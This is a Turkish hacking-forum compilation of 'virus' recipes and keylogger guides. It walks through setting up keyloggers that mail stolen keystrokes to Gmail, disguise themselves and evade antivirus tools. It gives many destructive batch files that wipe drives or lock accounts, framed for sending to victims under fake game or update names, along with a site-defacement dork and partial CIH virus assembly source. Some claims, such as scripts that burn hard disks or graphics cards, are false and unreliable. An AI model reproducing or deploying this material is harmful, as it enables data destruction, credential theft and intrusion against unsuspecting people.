Keyloggersız Bilgisayara Bağlanmak İsteyenlere!
Öncelikle Merhaba Arkadaşlar.
Size İmkansızı Sunayım Yine
Virüs Yemek imkansız Hale Geldi, Ya %100 Fud Bir Trojan Yazıcağız Desem?
Ya Bir De Bunun İçin Okuma Yazma Bilmek Yeter Desem Bir De?
Yok Artık Değil Bu Gerçek
İşte Videomuz:
DosyaUpload.NeT - File Upload Free File Hosting Dosya Upload Files Upload File Upload Swf Upload
Dosya Upload File Upload Free File Hosting Dosya Upload Files Upload Files Uploads File Upload image upload images upload Free File Hosting @ - dosyasitesi.com
Şifre: turkhackteam.net
Umarım Linkler Kırılmaz
Bir De Araç gereçleri Vereyim:
Essential NetTools 4.3 Yapı 264 - Detayli Tanitimi, Kullanici Yorumlari - innDir.com
Umarım Açıklayıcı Olmuşumdur
Asseletion Keylogger Full//%100 (Resimli)+(Videolu Anlatım)+(İndir)
Asseletion Keylogger
Merhaba Arkadaşlar
Öncelikle Herkese Tavsiyem olan
Asseletion Keylogger Bu konu daha çok çok önceden
Açılmıştır Fakat Linkleri ölmüş videolu anlatım kalmamıştır
------------------------------------------------------------------
Ve Alıntı Olanlar
1-Videolu Anlatım Bana Ait Değildir
2-İndirme Linki Bana Ait Değildir
Fakat sunum ve indirme Linki+Videolu Anlatım Linki Bozuk
Değildir Test Ettim Ayrıca Biliyoruz ki Her Keylogger da virus vardır
İşte Virus Sonuçları
Kara-Kötü gözükebilir fakat Gerçekten Pc ye zararı
Yoktur ve Kimse Binder'lememiştir kendim test ettim
------------------------------SORUMUSU BEN DEĞİLİM--------------------------
1-Eğer Kullanımını Bilmiyorsanız ki Anlattım fakat yanlışlık ile
Server.exe oluşturup kendi pc nizde açarsanız sorun olabilir
2-Eğer Başka bir pc yollarsanız ve dava açılırsa
farkedilip başlıkta belirttiğim gibi
3-Eğer Kişilerin Msn sini Çalıp Bu THT üyelikleri için kullanırsanız
Çok Ayıp olur ve bununda başlıkta belirttiğim gibi
------------------------------ASSELETİON Logger (Keylogger)-----------------
Bu Keylogger 'ın kullanımı için
Bir resim şart zaten biliyorsunuz ki
Aramızda bilmeyenler var onlara yardımcı olalım
1.Resim
Gördüğümüz gibi
Şimdi
1.Yapacağımız
Gmail Username; Gmail Adresinizi verin
Ör; tyl3@gmail.com
gibi
2.Yapacağımız
Gmail Password; Gmail Şifrenizi verin;
ör; ssasvvvav tabi bu böyle oluyor; *********
3.Yapacağımız
Burada Keyloggerımızın en güzel özelliği
"Server.exe" bunu istediğimiz uzantı ile yapabiliyoruz
Örneğin;
"Metin2hack.jpg"
"Metin2hack.exe"
"High Hacker.fpb"
"Obaa.txt"
"ZAA.XD"
"PcChoLikkardeşim.exe"
4.Yapacağımız Logların süresini belirler
burayı artık siz ayarlayın anlatmaya gerek yok
Mouse1.click ve Mouse2.click i kullanın
5.Yapacağımız (İsterseniz)
Error Message yani Kişi serverı açtığında
Anlamasın diye hata msj ı verir açıldığı anda
Eğer hata msj vermek istiyorsanız (önerilir)
Enabled Error Creation
a tıklayın
ve Hata msj ınızın başlığını
1.textboxa hatayıda 2.textboxa yazın
6.Yapacağımız
Burası zaten anlatmama gerek yok
sadece byte boyutunu ayarlayıp PUMP seçeneği
le gerekli ayarlamaları yapın yapayada bilirsiniz
ama yapmanız kesinlikle önerilir fakat abartmayın 1gb falan
7.Yapacağımız en güzeli
Burada
Özellikler bulunur
1.si başlangıç kesinlikle işaretleyin
2.si Antilere Yakalanmaz (Kapatır)
3.si Görev yöneticisi ortadan Kalkar çünkü taskı siler system32 den
istediğinizi yapmak için işaretleyin
fakat 1.yi kesin işaretleyin çok önemli çok
Ve oluşturmak için Test edinilk önce gmail ile şifresi doğruysa
Test Mail de olumlu İ çıkar gmail ile şifre yanlış ise e verir
Daha sonra Builde tıklayıp loggerın bulunduğu yere keyloggerınız
gelir
----------------------------------NOT--------------------------------
Stub+Keylogger
bu iki önemli dosyayı (.exe)'yi lütfen
Aynı Klasörde tutunuz yoksa hata oluşur
------------------------------HİGH HACKER---------------------------------
SUNAR..
Yorumlarınızı / Teşekkürlerinizi
Bol Keseden Verin
Saygılar
-------------------------------İNDİRME YOKMU ?---------------------------
Unutmuşum Gidiyorum
Videolu Anlatım
http://rapidshare.com/files/44216865...latae_mae_.wmv
İndirme Linki
Multiupload.com - upload your files to multiple file hosting sites!
İndirme Linki 2
Multiupload.com - upload your files to multiple file hosting sites!
İndirme Linki 2 'nin Rar Pass
deso.us
----------------------------NOT--------------------------
iNdirme Linki Alıntıdır
Fakat eğer herhangi bir pc
nize birşey olursa ki denedim
fakat ginede olursa sorumlusu ben değilim
Saygılar
Ardamax Keylogger 3.7 Full Serial Key Video Anlatım //ChoqFena
HotFile
Mediafire
Fileserve
Mediafire
FileServe
Uploadic
Arkadaşlar Linkler Düzenli Olarak Yenilenecektir.
Anti-Virüs ' ler Hakkında Bilmedikleriniz
Çalamayacağı şifre yok haze stealer videolu anlatım
https://www.box.com/shared/jae5k4b2gd
Krşı pc ye şifre koyma
Karşı pc ye şifre koy
bunu notepad e yapıştır hasdhajs yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet(deneme.bat) zip le sıkıştırın ve kurbana yollayın bunu açtığı zaman pc si kapanır ve şifrelenmiş olur açtığında pc şifre sorar.Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsanız shutdown -r kısmını silin.
Kodlar:
net user %username% hasdhajs
shutdown -r
Site Hacklemek Çok Basit
Merhaba arkadaşlar bazılarınız site ekleyip hava atmak istiyor bunu biliyoruz size bi yardımım dokunacak simdi napıcagımızı anlatıyorum bazılarınız virüs total diye yırtınıcak bu yuzden kodları buraya yazıcam ilk önce googlede aranıcak : inurl:"admin/my_D o c u m e n t s s/my_files" evet boyle bir çok site var ama hacklenmişleride var şifrelileride neyse girdik bi site buluyoruz ve admin/my_d o c u m e n t s/my_files yazan kısımda adminden sonrasını siliyoruz ve rte_popup_File_atch.asp yapıstırıyoruz.... Sonrasında yeni bi sayfa geliyor alt tarafta upload yazıyor ordan indeximizi secip kaydediyoruz site indexleniyor... -Tessekuru çok görme-Alıntı Değildir-- NOT: MY_ D O C U M E N T S YAZAN KISIMLARDAKİ BOŞLUKLARI SİLİN
bütün virüs kodları burada
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
-----------------------------------------
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:eni salak formatı yedin::.
@echo off
--------------------------------------------
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin.(mesela:fifa_2005_stream_install)
--------------------------------------------------------------------------
Çalışan ve Gördüğüm en Küçük Virüs
Bu Forumda Verilip verilmediğini tam olarak bilmiyorum ama Suan elimde çok basit yazılmış bir virüs var. Kodlar Aşağıdaki gibidir. Yapmanız gereken tek şey kodları Notepad e yapıştırıp uzantısını .bat olarak ayarlamak. sonra Msn de veya başka bir paylaşım programında başkasına gönderebilirsiniz. Peki virüsümüzün zararı nedir? sorusunun cevabı ise C sürücüsündeki bazı dosyaları siliyor ve 2 sn sonra bilgisayar resetleniyor. taki bir daha açılmamak üzere artık o pc yi format paklar...
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Format Down Up Your Sistem Limp_buskuit::.
@echo off
--------------------------------------------------------------------------
çok basit yöntem ile 1 dk içinde virüs yapımı ve sistem çöküyoo
Çok basit yöntemlerle 1 dk içinde format atan(ve attıktan sonra bilgisayar açılmıyor) virus yapabilirsiniz.
Açıklama:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
Kod:
@echo off C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off cls cls @echo .::Seni salak formatı yedin::. @echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
.
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak,formatı yedin yazıyor".
Not: "seni salak,formatı yedin" yazan yere kendi mesajınızı yazabilirsiniz...
nasıl .bat yapılır??
ms-dos komut istmini aç dosya neredeyse mesela C:\virus.txt şeklindeyse aynen şunu yazıcaksın...
C:\ren virus.txt virus.bat sonra enter diyoruz..Ve bat. yaptığımız dosyayı herhangi bir şekilde karşıdakine yediriyoruz...
--------------------------------------------------------------
Ekran Karti Yakma(alinti)program Bile Değil Işimizi Yazilarla Hallediyoruz
YAPACAGINIZ İŞLEM
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: HacKeD gülümse ::.
@echo off3.
METİN SAYFASI AÇIP
kodlarını yapıştırın ve farklı kaydet diyin. dosya adını yazın ve sonuna .bat yazın. (örnek: açma.bat)
vede kaydedin böylece ms-dos toplu iş dosyası oluşacak bunu sakın açmayın ve kimin ekran kartını yakmak istiyorsanız o kişiye yollayın. kurban dosyaya iki kere tıkadığı zaman saniyede 1000 den fazla ms-dos sayfası açılacak vede yaklasık 30 sn sonra ekran kartı gücünü kaybedip yorulacak. en sonunda HacKeD By MaNNeR_Boi yazısı görünecek (burayı kendiniz değiştirebilirsiniz) vede görüntü gidecek. yeni ekran kartı alana kadar da gelmiyecek kolay gelsin.
-------------------------------------------------------------
Format Virüsü
bunu notepade atın .bat olarak kaydedin karşı tarafa yollayın pcsine format atılacak
cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r
--------------------------------------------------------------------------
HDD yakan virüs
Arkadaşlar size verceğim kodu kişinin çalıştırına yazdırabilirseniz veye notpeda kodu yapıştırıp biçimini bat. e çeviirseniz dosyayı açtığı anda hddsi yanar işte komut
/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)
kolay yapmak isterseniz kurbana bunu çalıştıra yaz pc hızlanıo fln derseniz oltaya gelebilir hadi sizze kolay gelsin
--------------------------------------------------------------------------
Karşı pc ye şifre koy
bunu notepad e yapıştır 123456 yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet(örnek yun.bat) zip le sıkıştırın ve kurbana yollayın bunu açtığı zaman pc si kapanır ve şifrelenmiş olur açtığında pc şifre sorar.Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsanız shutdown -r kısmını silin.
Kodlar:
net user %username% 123456
shutdown -r
--------------------------------------------------------------------------
MSN de pc yi kitleme
1- öncelikle pc mizden not defteri acalım içine start yazıp kopyalayalım sonra sırasıyla yuzlerce start yazalım.
2- daha sonra kaydet diyelim ve bu dosyayı txt olarak degılde .bat olarak kaydedelim işte size pc dondurucu sakın kendı pcinizde acmayın ama denemek isteyenler açabilir.sonrada .rarlayıp gönderiyoruz karşı taraf açarsa
sonuc olarak pc de durmadan pencereler acılıyor yüzlerce reset atmak zorunda kalıyorsunuz.ekran kartını yoruyor ve yanmasına sebep oluyor.
--------------------------------------------------------------------------
***msn den pc çökertme***
Selam arkadaşlar msn den birine gıcık oluyorsanız işte buyrun.Lütfen masum arkadaşlar üzerinde denemeyin
————————————–
1.Notepad ’i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .:: BLooDY den formatı yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
NOT:
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Windows un önemli bi kaç dosyasını siliyor ve sonra ” BLooDY den formatı yedin yazıyor”.
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin
--------------------------------------------------------------------------
msn patlatma %100 başarı
tek yapmanız gereken kodu arkadaşınıza yedirmek kodu kişisel iletiye yazdığı an msn si kapanıyo ve bidaha açamıyo ( denendi onaylandı )
kod:
--------------------------------------------------------------------------------
ñ¯a_Á¯aÿ±m¯a�ÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ÑÇ á£áÇá
--------------------------------------------------------------------------
XP SiSTeM ÇöKeRTiCi PRoGRaMsıZ::
ARKADAŞLAR AŞAGIDA VERECEĞİM KODLARI KOPYALIYORUZ.
DAHA SONRA MASA ÜSTÜNE BİR TXT DOSYASI ACIP İÇİNE YAPIŞTIRIYORUZ.
FARKLI KAYDETTEN UZANTISINI .bat OLARAK KAYDEDİYORUZ.
DAHA SONRA DOSYAYI KURBANIMIZA YOLLUYORUZ.
KURBAN DOSYAYI ACINCA
"Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın."
ŞEKLİNDE BİR UYARI İLE KARŞILAŞAK...
PHP KODU:
echo off
echo Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın
echo off
pause
del /f /q d:
del /f /q c:
shutdown -r
shutdown -a buda panzehiri,, eğer kendi pcnizde açarsanız 30 saniye sonra pc format atacaktır sizde bunu panzehir olarak bi yere kaydedin.. sonrada yanlışlıkla açarsanız bunu açın olay bitti
Çernobil Virüs Kodu Ve Virüs Yaratmak!!!
1:Yeni bir metin belgesi açın.
2.Metin belgesine aşağıdaki kodu kopyalayıp yapıştırın.
3:Kopyaladıktan sonra sol üst kçşedeki "dosya" yazan yere basın ve farklı kaydet deyin
5osya ismini örnek oyun.bat yazın ne isterseniz yazabilirsiniz ama uzantısı .bat şekline olması gerekir ve kaydet deyin virüs hazır.
Kendi bilgisayarınızda sakın açmayın çökerr
Kod:
************************************************** *************************
*
; * The Virus Program Information *
;
************************************************** *************************
*
; *
*
; * Designer : CIH Original Place : TTIT of Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.2 *
; * Modification Time : 05/21/1998
*
; * *
;
*================================================= =========================
*
; * Modification History *
;
*================================================= =========================
*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System.
*
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected.
*
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
;
*================================================= =========================
*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
;
*================================================= =========================
*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
;
************************************************** *************************
*
.586P
;
************************************************** *************************
*
; * Original PE Executable File(Don't Modify this Section)
*
;
************************************************** *************************
*
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
;
************************************************** *************************
*
; * My Virus Game
*
;
************************************************** *************************
*
; ************************************************** *******
; * Constant Define *
; ************************************************** *******
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 2
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; ************************************************** *******
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; ************************************************** *******
; * Ring3 Virus Game Initial Program *
; ************************************************** *******
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call [at]0
[at]0:
pop ebx
lea ecx, StopToRunVirusCode-[at]0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-[at]1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
[at]1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ************************************************** *******
; * Ring0 Virus Game Initial Program *
; ************************************************** *******
MyExceptionHook:
[at]2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-[at]2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-[at]6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-[at]2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-[at]3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-[at]3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; ************************************************** *******
; * Code Size of Merge Virus Code Section *
; ************************************************** *******
CodeSizeOfMergeVirusCodeSection = offset $
; ************************************************** *******
; * IFSMgr_InstallFileSystemApiHook *
; ************************************************** *******
InstallFileSystemApiHook:
push ebx
call [at]4 ;
[at]4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-[at]4 ;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-[at]3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
OldInstallFileSystemApiHook dd ?
; ************************************************** *******
; * IFSMgr_FileSystemHook *
; ************************************************** *******
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
[at]3 = FileSystemApiHook
pushad
call [at]5 ;
[at]5: ;
pop esi ; mov esi, offset
VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-[at]5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-[at]6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-[at]6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-[at]6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-[at]7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
